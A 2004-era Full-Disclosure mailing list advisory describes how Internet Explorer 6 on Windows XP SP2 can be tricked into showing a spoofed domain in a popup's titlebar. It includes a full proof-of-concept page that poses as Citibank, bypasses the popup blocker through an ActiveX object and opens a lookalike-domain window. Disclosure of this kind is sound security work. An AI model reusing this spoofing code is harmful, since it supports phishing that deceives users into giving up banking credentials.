Hi LIST. Windows XP SP2 forces the titlebar to be present in script-initiated Internet Explorer windows. In the titlebar, domain name is listed before the page title. Using magic DNS,this domain name can be exploited by malicious people to trick users into visiting a malicious popup window. The weakness has been confirmed in version 6.0 on a fully patched system running Windows XP with SP2 installed. Example: - -----8<----- -----8<----- -----8<----- -----8<----- [!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> [!-- saved from url=(0014)about:internet --> [html lang="x-klingon"> [head> [title>Welcome to Citibank[/title> [meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> [meta http-equiv="Content-Script-Type" content="text/javascript"> [script type="text/javascript"> [!-- Begin function shellscript() { window.focus(); pURL = 'http://securelogin.citibank.com"+".e-gold.com/'; sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,'; sP += 'menubar=0,resizable=0,width=315,'; sP += 'height=200,left = 250,top = 200' day = new Date(); id = day.getTime(); eval("page" + id + " = window.open(pURL, '" + id + "',sP);"); } function main() { targetURL = 'http://citibank.com/us/index.htm'; x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); location.replace(targetURL); } setTimeout(' main() ',1000); // End --> [/script> [/head> [object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle" > [param name="ActivateApplets" value="1"> [param name="ActivateActiveXControls" value="1"> [/object> [/body> [/html> - -----8<----- -----8<----- -----8<----- -----8<----- Reference: http-equiv (HOW TO BREAK XP SP2 POPUP BLOCKER) http://www.securityfocus.com/archive/1/384037 REGARDS. -- bitlance winter _________________________________________________________________ On the road to retirement? Check out MSN Life Events for advice on how to get there! http://lifeevents.msn.com/category.aspx?cid=Retirement _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html